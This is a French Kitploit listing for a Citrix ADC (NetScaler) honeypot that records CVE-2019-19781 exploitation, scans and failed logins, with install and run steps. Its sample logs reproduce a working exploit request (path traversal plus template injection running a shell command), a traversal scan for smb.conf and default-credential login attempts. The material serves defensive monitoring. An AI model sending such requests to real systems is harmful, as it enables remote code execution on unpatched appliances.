Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
citrix-honeypot — Citrix ADC (NetScaler) Honeypot. Supporte la détection de CVE-2019-19781 et des tentatives de connexion. | Kitploit
Outils/GitHubGitHub/eliushhimel/citrix-honeypot
Outils DéfensifsAnalyse des VulnérabilitésSécurité WebSécurité RéseauRenseignement sur les Menaces
GitHubeliushhimel/citrix-honeypot

citrix-honeypot

Citrix ADC (NetScaler) Honeypot. Supporte la détection de CVE-2019-19781 et des tentatives de connexion.

Voir le dépôt
4il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Pot de miel Citrix ADC (NetScaler)

  • Détecte et enregistre les charges utiles pour CVE-2019-19781 (Shitrix / Citrixmash)
  • Enregistre les tentatives de connexion échouées
  • Sert du contenu et des en-têtes provenant d'un équipement réel afin d'augmenter les chances d'indexation dans les moteurs de recherche (ex : google, shodan, etc.)

capture d'écran

Installation

Précompilé

Paquet Linux (x64) précompilé disponible ici

root@kitploit:~
mkdir citrix-honeypot
cd citrix-honeypot
wget https://github.com/x1sec/citrix-honeypot/releases/download/v0.02/citrix-honeypot-linux-amd64.tar.gz
tar -xf citrix-honeypot-linux-amd64.tar.gz

go get

Si vous avez un environnement Go prêt à l'emploi :

root@kitploit:~
go get github.com/x1sec/citrix-honeypot

Exécution

Générer un certificat auto-signé :

root@kitploit:~
openssl genrsa -out server.key 2048
openssl ecparam -genkey -name secp384r1 -out server.key
openssl req -new -x509 -sha256 -key server.key -out server.crt -days 3650

C'est aussi simple que :

root@kitploit:~
./citrix-honeypot

Le pot de miel écoutera à la fois sur les ports 80 et 443 (il doit donc être exécuté en tant qu'utilisateur root)

Ou pour détacher et exécuter en tant que processus d'arrière-plan :

root@kitploit:~
nohup ./citrix-honeypot &

Journaux

Les résultats/données sont écrits dans le répertoire ./log. Ils sont :

hits.log - Tentatives de balayage et tentatives d'exploitation avec toutes les données (ex : en-têtes, corps de la requête POST)

all.log - Toutes les requêtes HTTP observées frappant le serveur

logins.log - Tentatives de connexion à l'interface web

tlsErrors.log - Souvent, les scanners Internet envoient des données invalides au port 443. Les erreurs HTTPS sont enregistrées ici.

Exemples

En exécutant le premier exploit publié :

root@kitploit:~
$ cat logs/hits.log 
2020/01/23 08:27:55 
-------------------
Exploitation detected ...
src: xxx.xxx.xxx.xxx
POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
Content-Length: 181
Content-Type: application/x-www-form-urlencoded
Nsc_nonce: test1337
Nsc_user: /../../../../../../../../../../netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS
User-Agent: curl/7.67.0

url=http://example.com\&title=[%25+template.new({'BLOCK'%3d'exec(\'id | tee /netscaler/portal/templates/zToMJRAzp0T0FuUS2cEp41ZZbmrtmUqS.xml\')%3b'})+%25]\&desc=test\&UI_inuse=RfWeb

Tentative de balayage :

root@kitploit:~
$ cat logs/hits.log 
2020/01/23 08:41:02 
-------------------
Scanning detected ... 
src: xxx.xxx.xxx.xxx
GET /vpn/../vpns/cfg/smb.conf HTTP/2.0
Host: xxx.xxx.xxx.xxx
Accept: */*
User-Agent: curl/7.67.0

Tentatives de connexion :

root@kitploit:~
$ cat logs/logins.log
2020/01/23 07:26:03 Failed login from xxx.xxx.xxx.xxx user:nsroot pass:nsroot
2020/01/23 08:26:03 Failed login from xxx.xxx.xxx.xxx user:admin pass:admin
Télécharger l’outil